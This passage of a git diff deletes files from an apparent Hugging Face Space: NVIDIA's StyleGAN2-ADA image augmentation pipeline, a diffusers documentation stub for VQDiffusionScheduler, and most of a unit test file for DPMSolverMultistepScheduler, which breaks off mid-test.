2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -"""Augmentation pipeline from the paper -"Training Generative Adversarial Networks with Limited Data". -Matches the original implementation by Karras et al. 
at -https://github.com/NVlabs/stylegan2-ada/blob/main/training/augment.py""" - -import numpy as np -import scipy.signal -import torch -from torch_utils import persistence -from torch_utils import misc -from torch_utils.ops import upfirdn2d -from torch_utils.ops import grid_sample_gradfix -from torch_utils.ops import conv2d_gradfix - -# ---------------------------------------------------------------------------- -# Coefficients of various wavelet decomposition low-pass filters. - -wavelets = { - 'haar': [0.7071067811865476, 0.7071067811865476], - 'db1': [0.7071067811865476, 0.7071067811865476], - 'db2': [-0.12940952255092145, 0.22414386804185735, 0.836516303737469, 0.48296291314469025], - 'db3': [0.035226291882100656, -0.08544127388224149, -0.13501102001039084, 0.4598775021193313, 0.8068915093133388, 0.3326705529509569], - 'db4': [-0.010597401784997278, 0.032883011666982945, 0.030841381835986965, -0.18703481171888114, -0.02798376941698385, 0.6308807679295904, 0.7148465705525415, 0.23037781330885523], - 'db5': [0.003335725285001549, -0.012580751999015526, -0.006241490213011705, 0.07757149384006515, -0.03224486958502952, -0.24229488706619015, 0.13842814590110342, 0.7243085284385744, 0.6038292697974729, 0.160102397974125], - 'db6': [-0.00107730108499558, 0.004777257511010651, 0.0005538422009938016, -0.031582039318031156, 0.02752286553001629, 0.09750160558707936, -0.12976686756709563, -0.22626469396516913, 0.3152503517092432, 0.7511339080215775, 0.4946238903983854, 0.11154074335008017], - 'db7': [0.0003537138000010399, -0.0018016407039998328, 0.00042957797300470274, 0.012550998556013784, -0.01657454163101562, -0.03802993693503463, 0.0806126091510659, 0.07130921926705004, -0.22403618499416572, -0.14390600392910627, 0.4697822874053586, 0.7291320908465551, 0.39653931948230575, 0.07785205408506236], - 'db8': [-0.00011747678400228192, 0.0006754494059985568, -0.0003917403729959771, -0.00487035299301066, 0.008746094047015655, 0.013981027917015516, -0.04408825393106472, -0.01736930100202211, 0.128747426620186, 0.00047248457399797254, -0.2840155429624281, -0.015829105256023893, 0.5853546836548691, 0.6756307362980128, 0.3128715909144659, 0.05441584224308161], - 'sym2': [-0.12940952255092145, 0.22414386804185735, 0.836516303737469, 0.48296291314469025], - 'sym3': [0.035226291882100656, -0.08544127388224149, -0.13501102001039084, 0.4598775021193313, 0.8068915093133388, 0.3326705529509569], - 'sym4': [-0.07576571478927333, -0.02963552764599851, 0.49761866763201545, 0.8037387518059161, 0.29785779560527736, -0.09921954357684722, -0.012603967262037833, 0.0322231006040427], - 'sym5': [0.027333068345077982, 0.029519490925774643, -0.039134249302383094, 0.1993975339773936, 0.7234076904024206, 0.6339789634582119, 0.01660210576452232, -0.17532808990845047, -0.021101834024758855, 0.019538882735286728], - 'sym6': [0.015404109327027373, 0.0034907120842174702, -0.11799011114819057, -0.048311742585633, 0.4910559419267466, 0.787641141030194, 0.3379294217276218, -0.07263752278646252, -0.021060292512300564, 0.04472490177066578, 0.0017677118642428036, -0.007800708325034148], - 'sym7': [0.002681814568257878, -0.0010473848886829163, -0.01263630340325193, 0.03051551316596357, 0.0678926935013727, -0.049552834937127255, 0.017441255086855827, 0.5361019170917628, 0.767764317003164, 0.2886296317515146, -0.14004724044296152, -0.10780823770381774, 0.004010244871533663, 0.010268176708511255], - 'sym8': [-0.0033824159510061256, -0.0005421323317911481, 0.03169508781149298, 0.007607487324917605, -0.1432942383508097, -0.061273359067658524, 
0.4813596512583722, 0.7771857517005235, 0.3644418948353314, -0.05194583810770904, -0.027219029917056003, 0.049137179673607506, 0.003808752013890615, -0.01495225833704823, -0.0003029205147213668, 0.0018899503327594609], -} - -# ---------------------------------------------------------------------------- -# Helpers for constructing transformation matrices. - - -def matrix(*rows, device=None): - assert all(len(row) == len(rows[0]) for row in rows) - elems = [x for row in rows for x in row] - ref = [x for x in elems if isinstance(x, torch.Tensor)] - if len(ref) == 0: - return misc.constant(np.asarray(rows), device=device) - assert device is None or device == ref[0].device - elems = [x if isinstance(x, torch.Tensor) else misc.constant( - x, shape=ref[0].shape, device=ref[0].device) for x in elems] - return torch.stack(elems, dim=-1).reshape(ref[0].shape + (len(rows), -1)) - - -def translate2d(tx, ty, **kwargs): - return matrix( - [1, 0, tx], - [0, 1, ty], - [0, 0, 1], - **kwargs) - - -def translate3d(tx, ty, tz, **kwargs): - return matrix( - [1, 0, 0, tx], - [0, 1, 0, ty], - [0, 0, 1, tz], - [0, 0, 0, 1], - **kwargs) - - -def scale2d(sx, sy, **kwargs): - return matrix( - [sx, 0, 0], - [0, sy, 0], - [0, 0, 1], - **kwargs) - - -def scale3d(sx, sy, sz, **kwargs): - return matrix( - [sx, 0, 0, 0], - [0, sy, 0, 0], - [0, 0, sz, 0], - [0, 0, 0, 1], - **kwargs) - - -def rotate2d(theta, **kwargs): - return matrix( - [torch.cos(theta), torch.sin(-theta), 0], - [torch.sin(theta), torch.cos(theta), 0], - [0, 0, 1], - **kwargs) - - -def rotate3d(v, theta, **kwargs): - vx = v[..., 0] - vy = v[..., 1] - vz = v[..., 2] - s = torch.sin(theta) - c = torch.cos(theta) - cc = 1 - c - return matrix( - [vx*vx*cc+c, vx*vy*cc-vz*s, vx*vz*cc+vy*s, 0], - [vy*vx*cc+vz*s, vy*vy*cc+c, vy*vz*cc-vx*s, 0], - [vz*vx*cc-vy*s, vz*vy*cc+vx*s, vz*vz*cc+c, 0], - [0, 0, 0, 1], - **kwargs) - - -def translate2d_inv(tx, ty, **kwargs): - return translate2d(-tx, -ty, **kwargs) - - -def scale2d_inv(sx, sy, **kwargs): - return scale2d(1 / sx, 1 / sy, **kwargs) - - -def rotate2d_inv(theta, **kwargs): - return rotate2d(-theta, **kwargs) - -# ---------------------------------------------------------------------------- -# Versatile image augmentation pipeline from the paper -# "Training Generative Adversarial Networks with Limited Data". -# -# All augmentations are disabled by default; individual augmentations can -# be enabled by setting their probability multipliers to 1. - - -@persistence.persistent_class -class AugmentPipe(torch.nn.Module): - def __init__(self, - xflip=0, rotate90=0, xint=0, xint_max=0.125, - scale=0, rotate=0, aniso=0, xfrac=0, scale_std=0.2, rotate_max=1, aniso_std=0.2, xfrac_std=0.125, - brightness=0, contrast=0, lumaflip=0, hue=0, saturation=0, brightness_std=0.2, contrast_std=0.5, hue_max=1, saturation_std=1, - imgfilter=0, imgfilter_bands=[1, 1, 1, 1], imgfilter_std=1, - noise=0, cutout=0, noise_std=0.1, cutout_size=0.5, - ): - super().__init__() - # Overall multiplier for augmentation probability. - self.register_buffer('p', torch.ones([])) - - # Pixel blitting. - # Probability multiplier for x-flip. - self.xflip = float(xflip) - # Probability multiplier for 90 degree rotations. - self.rotate90 = float(rotate90) - # Probability multiplier for integer translation. - self.xint = float(xint) - # Range of integer translation, relative to image dimensions. - self.xint_max = float(xint_max) - - # General geometric transformations. - # Probability multiplier for isotropic scaling. 
- self.scale = float(scale)
- # Probability multiplier for arbitrary rotation.
- self.rotate = float(rotate)
- # Probability multiplier for anisotropic scaling.
- self.aniso = float(aniso)
- # Probability multiplier for fractional translation.
- self.xfrac = float(xfrac)
- # Log2 standard deviation of isotropic scaling.
- self.scale_std = float(scale_std)
- # Range of arbitrary rotation, 1 = full circle.
- self.rotate_max = float(rotate_max)
- # Log2 standard deviation of anisotropic scaling.
- self.aniso_std = float(aniso_std)
- # Standard deviation of fractional translation, relative to image dimensions.
- self.xfrac_std = float(xfrac_std)
-
- # Color transformations.
- # Probability multiplier for brightness.
- self.brightness = float(brightness)
- # Probability multiplier for contrast.
- self.contrast = float(contrast)
- # Probability multiplier for luma flip.
- self.lumaflip = float(lumaflip)
- # Probability multiplier for hue rotation.
- self.hue = float(hue)
- # Probability multiplier for saturation.
- self.saturation = float(saturation)
- # Standard deviation of brightness.
- self.brightness_std = float(brightness_std)
- # Log2 standard deviation of contrast.
- self.contrast_std = float(contrast_std)
- # Range of hue rotation, 1 = full circle.
- self.hue_max = float(hue_max)
- # Log2 standard deviation of saturation.
- self.saturation_std = float(saturation_std)
-
- # Image-space filtering.
- # Probability multiplier for image-space filtering.
- self.imgfilter = float(imgfilter)
- # Probability multipliers for individual frequency bands.
- self.imgfilter_bands = list(imgfilter_bands)
- # Log2 standard deviation of image-space filter amplification.
- self.imgfilter_std = float(imgfilter_std)
-
- # Image-space corruptions.
- # Probability multiplier for additive RGB noise.
- self.noise = float(noise)
- # Probability multiplier for cutout.
- self.cutout = float(cutout)
- # Standard deviation of additive RGB noise.
- self.noise_std = float(noise_std)
- # Size of the cutout rectangle, relative to image dimensions.
- self.cutout_size = float(cutout_size)
-
- # Setup orthogonal lowpass filter for geometric augmentations.
- self.register_buffer(
- 'Hz_geom', upfirdn2d.setup_filter(wavelets['sym6']))
-
- # Construct filter bank for image-space filtering.
- Hz_lo = np.asarray(wavelets['sym2']) # H(z)
- Hz_hi = Hz_lo * ((-1) ** np.arange(Hz_lo.size)) # H(-z)
- Hz_lo2 = np.convolve(Hz_lo, Hz_lo[::-1]) / 2 # H(z) * H(z^-1) / 2
- Hz_hi2 = np.convolve(Hz_hi, Hz_hi[::-1]) / 2 # H(-z) * H(-z^-1) / 2
- Hz_fbank = np.eye(4, 1) # Bandpass(H(z), b_i)
- for i in range(1, Hz_fbank.shape[0]):
- Hz_fbank = np.dstack([Hz_fbank, np.zeros_like(Hz_fbank)]).reshape(
- Hz_fbank.shape[0], -1)[:, :-1]
- Hz_fbank = scipy.signal.convolve(Hz_fbank, [Hz_lo2])
- Hz_fbank[i, (Hz_fbank.shape[1] - Hz_hi2.size) //
- 2: (Hz_fbank.shape[1] + Hz_hi2.size) // 2] += Hz_hi2
- self.register_buffer('Hz_fbank', torch.as_tensor(
- Hz_fbank, dtype=torch.float32))
-
- def forward(self, images, debug_percentile=None):
- assert isinstance(images, torch.Tensor) and images.ndim == 4
- batch_size, num_channels, height, width = images.shape
- device = images.device
- if debug_percentile is not None:
- debug_percentile = torch.as_tensor(
- debug_percentile, dtype=torch.float32, device=device)
-
- # -------------------------------------
- # Select parameters for pixel blitting. 
- # ------------------------------------- - - # Initialize inverse homogeneous 2D transform: G_inv @ pixel_out ==> pixel_in - I_3 = torch.eye(3, device=device) - G_inv = I_3 - - # Apply x-flip with probability (xflip * strength). - if self.xflip > 0: - i = torch.floor(torch.rand([batch_size], device=device) * 2) - i = torch.where(torch.rand( - [batch_size], device=device) < self.xflip * self.p, i, torch.zeros_like(i)) - if debug_percentile is not None: - i = torch.full_like(i, torch.floor(debug_percentile * 2)) - G_inv = G_inv @ scale2d_inv(1 - 2 * i, 1) - - # Apply 90 degree rotations with probability (rotate90 * strength). - if self.rotate90 > 0: - i = torch.floor(torch.rand([batch_size], device=device) * 4) - i = torch.where(torch.rand( - [batch_size], device=device) < self.rotate90 * self.p, i, torch.zeros_like(i)) - if debug_percentile is not None: - i = torch.full_like(i, torch.floor(debug_percentile * 4)) - G_inv = G_inv @ rotate2d_inv(-np.pi / 2 * i) - - # Apply integer translation with probability (xint * strength). - if self.xint > 0: - t = (torch.rand([batch_size, 2], device=device) - * 2 - 1) * self.xint_max - t = torch.where(torch.rand( - [batch_size, 1], device=device) < self.xint * self.p, t, torch.zeros_like(t)) - if debug_percentile is not None: - t = torch.full_like( - t, (debug_percentile * 2 - 1) * self.xint_max) - G_inv = G_inv @ translate2d_inv(torch.round( - t[:, 0] * width), torch.round(t[:, 1] * height)) - - # -------------------------------------------------------- - # Select parameters for general geometric transformations. - # -------------------------------------------------------- - - # Apply isotropic scaling with probability (scale * strength). - if self.scale > 0: - s = torch.exp2(torch.randn( - [batch_size], device=device) * self.scale_std) - s = torch.where(torch.rand( - [batch_size], device=device) < self.scale * self.p, s, torch.ones_like(s)) - if debug_percentile is not None: - s = torch.full_like(s, torch.exp2(torch.erfinv( - debug_percentile * 2 - 1) * self.scale_std)) - G_inv = G_inv @ scale2d_inv(s, s) - - # Apply pre-rotation with probability p_rot. - # P(pre OR post) = p - p_rot = 1 - torch.sqrt((1 - self.rotate * self.p).clamp(0, 1)) - if self.rotate > 0: - theta = (torch.rand([batch_size], device=device) - * 2 - 1) * np.pi * self.rotate_max - theta = torch.where(torch.rand( - [batch_size], device=device) < p_rot, theta, torch.zeros_like(theta)) - if debug_percentile is not None: - theta = torch.full_like( - theta, (debug_percentile * 2 - 1) * np.pi * self.rotate_max) - G_inv = G_inv @ rotate2d_inv(-theta) # Before anisotropic scaling. - - # Apply anisotropic scaling with probability (aniso * strength). - if self.aniso > 0: - s = torch.exp2(torch.randn( - [batch_size], device=device) * self.aniso_std) - s = torch.where(torch.rand( - [batch_size], device=device) < self.aniso * self.p, s, torch.ones_like(s)) - if debug_percentile is not None: - s = torch.full_like(s, torch.exp2(torch.erfinv( - debug_percentile * 2 - 1) * self.aniso_std)) - G_inv = G_inv @ scale2d_inv(s, 1 / s) - - # Apply post-rotation with probability p_rot. - if self.rotate > 0: - theta = (torch.rand([batch_size], device=device) - * 2 - 1) * np.pi * self.rotate_max - theta = torch.where(torch.rand( - [batch_size], device=device) < p_rot, theta, torch.zeros_like(theta)) - if debug_percentile is not None: - theta = torch.zeros_like(theta) - G_inv = G_inv @ rotate2d_inv(-theta) # After anisotropic scaling. - - # Apply fractional translation with probability (xfrac * strength). 
- if self.xfrac > 0: - t = torch.randn([batch_size, 2], device=device) * self.xfrac_std - t = torch.where(torch.rand( - [batch_size, 1], device=device) < self.xfrac * self.p, t, torch.zeros_like(t)) - if debug_percentile is not None: - t = torch.full_like(t, torch.erfinv( - debug_percentile * 2 - 1) * self.xfrac_std) - G_inv = G_inv @ translate2d_inv(t[:, 0] * width, t[:, 1] * height) - - # ---------------------------------- - # Execute geometric transformations. - # ---------------------------------- - - # Execute if the transform is not identity. - if G_inv is not I_3: - - # Calculate padding. - cx = (width - 1) / 2 - cy = (height - 1) / 2 - cp = matrix([-cx, -cy, 1], [cx, -cy, 1], [cx, cy, 1], - [-cx, cy, 1], device=device) # [idx, xyz] - cp = G_inv @ cp.t() # [batch, xyz, idx] - Hz_pad = self.Hz_geom.shape[0] // 4 - margin = cp[:, :2, :].permute( - 1, 0, 2).flatten(1) # [xy, batch * idx] - # [x0, y0, x1, y1] - margin = torch.cat([-margin, margin]).max(dim=1).values - margin = margin + \ - misc.constant([Hz_pad * 2 - cx, Hz_pad * 2 - cy] - * 2, device=device) - margin = margin.max(misc.constant([0, 0] * 2, device=device)) - margin = margin.min(misc.constant( - [width-1, height-1] * 2, device=device)) - mx0, my0, mx1, my1 = margin.ceil().to(torch.int32) - - # Pad image and adjust origin. - images = torch.nn.functional.pad( - input=images, pad=[mx0, mx1, my0, my1], mode='reflect') - G_inv = translate2d((mx0 - mx1) / 2, (my0 - my1) / 2) @ G_inv - - # Upsample. - images = upfirdn2d.upsample2d(x=images, f=self.Hz_geom, up=2) - G_inv = scale2d( - 2, 2, device=device) @ G_inv @ scale2d_inv(2, 2, device=device) - G_inv = translate2d(-0.5, -0.5, - device=device) @ G_inv @ translate2d_inv(-0.5, -0.5, device=device) - - # Execute transformation. - shape = [batch_size, num_channels, - (height + Hz_pad * 2) * 2, (width + Hz_pad * 2) * 2] - G_inv = scale2d(2 / images.shape[3], 2 / images.shape[2], device=device) @ G_inv @ scale2d_inv( - 2 / shape[3], 2 / shape[2], device=device) - grid = torch.nn.functional.affine_grid( - theta=G_inv[:, :2, :], size=shape, align_corners=False) - images = grid_sample_gradfix.grid_sample(images, grid) - - # Downsample and crop. - images = upfirdn2d.downsample2d( - x=images, f=self.Hz_geom, down=2, padding=-Hz_pad*2, flip_filter=True) - - # -------------------------------------------- - # Select parameters for color transformations. - # -------------------------------------------- - - # Initialize homogeneous 3D transformation matrix: C @ color_in ==> color_out - I_4 = torch.eye(4, device=device) - C = I_4 - - # Apply brightness with probability (brightness * strength). - if self.brightness > 0: - b = torch.randn([batch_size], device=device) * self.brightness_std - b = torch.where(torch.rand( - [batch_size], device=device) < self.brightness * self.p, b, torch.zeros_like(b)) - if debug_percentile is not None: - b = torch.full_like(b, torch.erfinv( - debug_percentile * 2 - 1) * self.brightness_std) - C = translate3d(b, b, b) @ C - - # Apply contrast with probability (contrast * strength). - if self.contrast > 0: - c = torch.exp2(torch.randn( - [batch_size], device=device) * self.contrast_std) - c = torch.where(torch.rand( - [batch_size], device=device) < self.contrast * self.p, c, torch.ones_like(c)) - if debug_percentile is not None: - c = torch.full_like(c, torch.exp2(torch.erfinv( - debug_percentile * 2 - 1) * self.contrast_std)) - C = scale3d(c, c, c) @ C - - # Apply luma flip with probability (lumaflip * strength). - # Luma axis. 
- v = misc.constant(np.asarray([1, 1, 1, 0]) / np.sqrt(3), device=device) - if self.lumaflip > 0: - i = torch.floor(torch.rand([batch_size, 1, 1], device=device) * 2) - i = torch.where(torch.rand( - [batch_size, 1, 1], device=device) < self.lumaflip * self.p, i, torch.zeros_like(i)) - if debug_percentile is not None: - i = torch.full_like(i, torch.floor(debug_percentile * 2)) - C = (I_4 - 2 * v.ger(v) * i) @ C # Householder reflection. - - # Apply hue rotation with probability (hue * strength). - if self.hue > 0 and num_channels > 1: - theta = (torch.rand([batch_size], device=device) - * 2 - 1) * np.pi * self.hue_max - theta = torch.where(torch.rand( - [batch_size], device=device) < self.hue * self.p, theta, torch.zeros_like(theta)) - if debug_percentile is not None: - theta = torch.full_like( - theta, (debug_percentile * 2 - 1) * np.pi * self.hue_max) - C = rotate3d(v, theta) @ C # Rotate around v. - - # Apply saturation with probability (saturation * strength). - if self.saturation > 0 and num_channels > 1: - s = torch.exp2(torch.randn( - [batch_size, 1, 1], device=device) * self.saturation_std) - s = torch.where(torch.rand( - [batch_size, 1, 1], device=device) < self.saturation * self.p, s, torch.ones_like(s)) - if debug_percentile is not None: - s = torch.full_like(s, torch.exp2(torch.erfinv( - debug_percentile * 2 - 1) * self.saturation_std)) - C = (v.ger(v) + (I_4 - v.ger(v)) * s) @ C - - # ------------------------------ - # Execute color transformations. - # ------------------------------ - - # Execute if the transform is not identity. - if C is not I_4: - images = images.reshape([batch_size, num_channels, height * width]) - if num_channels == 3: - images = C[:, :3, :3] @ images + C[:, :3, 3:] - elif num_channels == 1: - C = C[:, :3, :].mean(dim=1, keepdims=True) - images = images * \ - C[:, :, :3].sum(dim=2, keepdims=True) + C[:, :, 3:] - else: - raise ValueError( - 'Image must be RGB (3 channels) or L (1 channel)') - images = images.reshape([batch_size, num_channels, height, width]) - - # ---------------------- - # Image-space filtering. - # ---------------------- - - if self.imgfilter > 0: - num_bands = self.Hz_fbank.shape[0] - assert len(self.imgfilter_bands) == num_bands - # Expected power spectrum (1/f). - expected_power = misc.constant( - np.array([10, 1, 1, 1]) / 13, device=device) - - # Apply amplification for each band with probability (imgfilter * strength * band_strength). - # Global gain vector (identity). - g = torch.ones([batch_size, num_bands], device=device) - for i, band_strength in enumerate(self.imgfilter_bands): - t_i = torch.exp2(torch.randn( - [batch_size], device=device) * self.imgfilter_std) - t_i = torch.where(torch.rand( - [batch_size], device=device) < self.imgfilter * self.p * band_strength, t_i, torch.ones_like(t_i)) - if debug_percentile is not None: - t_i = torch.full_like(t_i, torch.exp2(torch.erfinv( - debug_percentile * 2 - 1) * self.imgfilter_std)) if band_strength > 0 else torch.ones_like(t_i) - # Temporary gain vector. - t = torch.ones([batch_size, num_bands], device=device) - # Replace i'th element. - t[:, i] = t_i - # Normalize power. - t = t / (expected_power * t.square() - ).sum(dim=-1, keepdims=True).sqrt() - # Accumulate into global gain. - g = g * t - - # Construct combined amplification filter. 
- # [batch, tap] - Hz_prime = g @ self.Hz_fbank - Hz_prime = Hz_prime.unsqueeze(1).repeat( - [1, num_channels, 1]) # [batch, channels, tap] - # [batch * channels, 1, tap] - Hz_prime = Hz_prime.reshape([batch_size * num_channels, 1, -1]) - - # Apply filter. - p = self.Hz_fbank.shape[1] // 2 - images = images.reshape( - [1, batch_size * num_channels, height, width]) - images = torch.nn.functional.pad( - input=images, pad=[p, p, p, p], mode='reflect') - images = conv2d_gradfix.conv2d( - input=images, weight=Hz_prime.unsqueeze(2), groups=batch_size*num_channels) - images = conv2d_gradfix.conv2d( - input=images, weight=Hz_prime.unsqueeze(3), groups=batch_size*num_channels) - images = images.reshape([batch_size, num_channels, height, width]) - - # ------------------------ - # Image-space corruptions. - # ------------------------ - - # Apply additive RGB noise with probability (noise * strength). - if self.noise > 0: - sigma = torch.randn([batch_size, 1, 1, 1], - device=device).abs() * self.noise_std - sigma = torch.where(torch.rand( - [batch_size, 1, 1, 1], device=device) < self.noise * self.p, sigma, torch.zeros_like(sigma)) - if debug_percentile is not None: - sigma = torch.full_like(sigma, torch.erfinv( - debug_percentile) * self.noise_std) - images = images + \ - torch.randn([batch_size, num_channels, height, - width], device=device) * sigma - - # Apply cutout with probability (cutout * strength). - if self.cutout > 0: - size = torch.full([batch_size, 2, 1, 1, 1], - self.cutout_size, device=device) - size = torch.where(torch.rand( - [batch_size, 1, 1, 1, 1], device=device) < self.cutout * self.p, size, torch.zeros_like(size)) - center = torch.rand([batch_size, 2, 1, 1, 1], device=device) - if debug_percentile is not None: - size = torch.full_like(size, self.cutout_size) - center = torch.full_like(center, debug_percentile) - coord_x = torch.arange(width, device=device).reshape([1, 1, 1, -1]) - coord_y = torch.arange( - height, device=device).reshape([1, 1, -1, 1]) - mask_x = (((coord_x + 0.5) / width - - center[:, 0]).abs() >= size[:, 0] / 2) - mask_y = (((coord_y + 0.5) / height - - center[:, 1]).abs() >= size[:, 1] / 2) - mask = torch.logical_or(mask_x, mask_y).to(torch.float32) - images = images * mask - - return images - -# ---------------------------------------------------------------------------- diff --git a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/docs/source/en/api/schedulers/vq_diffusion.md b/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/docs/source/en/api/schedulers/vq_diffusion.md deleted file mode 100644 index 0ed145119fd2b513a4a1e33af894ae1c0f71df49..0000000000000000000000000000000000000000 --- a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/docs/source/en/api/schedulers/vq_diffusion.md +++ /dev/null @@ -1,20 +0,0 @@ - - -# VQDiffusionScheduler - -## Overview - -Original paper can be found [here](https://arxiv.org/abs/2111.14822) - -## VQDiffusionScheduler -[[autodoc]] VQDiffusionScheduler \ No newline at end of file diff --git a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/tests/schedulers/test_scheduler_dpm_multi.py b/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/tests/schedulers/test_scheduler_dpm_multi.py deleted file mode 100644 index c9935780b9830f44cfd4d2e2ba76c2282baeab53..0000000000000000000000000000000000000000 --- a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/tests/schedulers/test_scheduler_dpm_multi.py +++ /dev/null @@ -1,273 +0,0 @@ -import tempfile - -import torch - -from diffusers import ( - 
DEISMultistepScheduler, - DPMSolverMultistepScheduler, - DPMSolverSinglestepScheduler, - UniPCMultistepScheduler, -) - -from .test_schedulers import SchedulerCommonTest - - -class DPMSolverMultistepSchedulerTest(SchedulerCommonTest): - scheduler_classes = (DPMSolverMultistepScheduler,) - forward_default_kwargs = (("num_inference_steps", 25),) - - def get_scheduler_config(self, **kwargs): - config = { - "num_train_timesteps": 1000, - "beta_start": 0.0001, - "beta_end": 0.02, - "beta_schedule": "linear", - "solver_order": 2, - "prediction_type": "epsilon", - "thresholding": False, - "sample_max_value": 1.0, - "algorithm_type": "dpmsolver++", - "solver_type": "midpoint", - "lower_order_final": False, - "lambda_min_clipped": -float("inf"), - "variance_type": None, - } - - config.update(**kwargs) - return config - - def check_over_configs(self, time_step=0, **config): - kwargs = dict(self.forward_default_kwargs) - num_inference_steps = kwargs.pop("num_inference_steps", None) - sample = self.dummy_sample - residual = 0.1 * sample - dummy_past_residuals = [residual + 0.2, residual + 0.15, residual + 0.10] - - for scheduler_class in self.scheduler_classes: - scheduler_config = self.get_scheduler_config(**config) - scheduler = scheduler_class(**scheduler_config) - scheduler.set_timesteps(num_inference_steps) - # copy over dummy past residuals - scheduler.model_outputs = dummy_past_residuals[: scheduler.config.solver_order] - - with tempfile.TemporaryDirectory() as tmpdirname: - scheduler.save_config(tmpdirname) - new_scheduler = scheduler_class.from_pretrained(tmpdirname) - new_scheduler.set_timesteps(num_inference_steps) - # copy over dummy past residuals - new_scheduler.model_outputs = dummy_past_residuals[: new_scheduler.config.solver_order] - - output, new_output = sample, sample - for t in range(time_step, time_step + scheduler.config.solver_order + 1): - output = scheduler.step(residual, t, output, **kwargs).prev_sample - new_output = new_scheduler.step(residual, t, new_output, **kwargs).prev_sample - - assert torch.sum(torch.abs(output - new_output)) < 1e-5, "Scheduler outputs are not identical" - - def test_from_save_pretrained(self): - pass - - def check_over_forward(self, time_step=0, **forward_kwargs): - kwargs = dict(self.forward_default_kwargs) - num_inference_steps = kwargs.pop("num_inference_steps", None) - sample = self.dummy_sample - residual = 0.1 * sample - dummy_past_residuals = [residual + 0.2, residual + 0.15, residual + 0.10] - - for scheduler_class in self.scheduler_classes: - scheduler_config = self.get_scheduler_config() - scheduler = scheduler_class(**scheduler_config) - scheduler.set_timesteps(num_inference_steps) - - # copy over dummy past residuals (must be after setting timesteps) - scheduler.model_outputs = dummy_past_residuals[: scheduler.config.solver_order] - - with tempfile.TemporaryDirectory() as tmpdirname: - scheduler.save_config(tmpdirname) - new_scheduler = scheduler_class.from_pretrained(tmpdirname) - # copy over dummy past residuals - new_scheduler.set_timesteps(num_inference_steps) - - # copy over dummy past residual (must be after setting timesteps) - new_scheduler.model_outputs = dummy_past_residuals[: new_scheduler.config.solver_order] - - output = scheduler.step(residual, time_step, sample, **kwargs).prev_sample - new_output = new_scheduler.step(residual, time_step, sample, **kwargs).prev_sample - - assert torch.sum(torch.abs(output - new_output)) < 1e-5, "Scheduler outputs are not identical" - - def full_loop(self, scheduler=None, **config): - if 
scheduler is None: - scheduler_class = self.scheduler_classes[0] - scheduler_config = self.get_scheduler_config(**config) - scheduler = scheduler_class(**scheduler_config) - - num_inference_steps = 10 - model = self.dummy_model() - sample = self.dummy_sample_deter - scheduler.set_timesteps(num_inference_steps) - - for i, t in enumerate(scheduler.timesteps): - residual = model(sample, t) - sample = scheduler.step(residual, t, sample).prev_sample - - return sample - - def test_step_shape(self): - kwargs = dict(self.forward_default_kwargs) - - num_inference_steps = kwargs.pop("num_inference_steps", None) - - for scheduler_class in self.scheduler_classes: - scheduler_config = self.get_scheduler_config() - scheduler = scheduler_class(**scheduler_config) - - sample = self.dummy_sample - residual = 0.1 * sample - - if num_inference_steps is not None and hasattr(scheduler, "set_timesteps"): - scheduler.set_timesteps(num_inference_steps) - elif num_inference_steps is not None and not hasattr(scheduler, "set_timesteps"): - kwargs["num_inference_steps"] = num_inference_steps - - # copy over dummy past residuals (must be done after set_timesteps) - dummy_past_residuals = [residual + 0.2, residual + 0.15, residual + 0.10] - scheduler.model_outputs = dummy_past_residuals[: scheduler.config.solver_order] - - time_step_0 = scheduler.timesteps[5] - time_step_1 = scheduler.timesteps[6] - - output_0 = scheduler.step(residual, time_step_0, sample, **kwargs).prev_sample - output_1 = scheduler.step(residual, time_step_1, sample, **kwargs).prev_sample - - self.assertEqual(output_0.shape, sample.shape) - self.assertEqual(output_0.shape, output_1.shape) - - def test_timesteps(self): - for timesteps in [25, 50, 100, 999, 1000]: - self.check_over_configs(num_train_timesteps=timesteps) - - def test_thresholding(self): - self.check_over_configs(thresholding=False) - for order in [1, 2, 3]: - for solver_type in ["midpoint", "heun"]: - for threshold in [0.5, 1.0, 2.0]: - for prediction_type in ["epsilon", "sample"]: - self.check_over_configs( - thresholding=True, - prediction_type=prediction_type, - sample_max_value=threshold, - algorithm_type="dpmsolver++", - solver_order=order, - solver_type=solver_type, - ) - - def test_prediction_type(self): - for prediction_type in ["epsilon", "v_prediction"]: - self.check_over_configs(prediction_type=prediction_type) - - def test_solver_order_and_type(self): - for algorithm_type in ["dpmsolver", "dpmsolver++", "sde-dpmsolver", "sde-dpmsolver++"]: - for solver_type in ["midpoint", "heun"]: - for order in [1, 2, 3]: - for prediction_type in ["epsilon", "sample"]: - if algorithm_type in ["sde-dpmsolver", "sde-dpmsolver++"]: - if order == 3: - continue - else: - self.check_over_configs( - solver_order=order, - solver_type=solver_type, - prediction_type=prediction_type, - algorithm_type=algorithm_type, - ) - sample = self.full_loop( - solver_order=order, - solver_type=solver_type, - prediction_type=prediction_type, - algorithm_type=algorithm_type, - ) - assert not torch.isnan(sample).any(), "Samples have nan numbers" - - def test_lower_order_final(self): - self.check_over_configs(lower_order_final=True) - self.check_over_configs(lower_order_final=False) - - def test_lambda_min_clipped(self): - self.check_over_configs(lambda_min_clipped=-float("inf")) - self.check_over_configs(lambda_min_clipped=-5.1) - - def test_variance_type(self): - self.check_over_configs(variance_type=None) - self.check_over_configs(variance_type="learned_range") - - def test_inference_steps(self): - for 
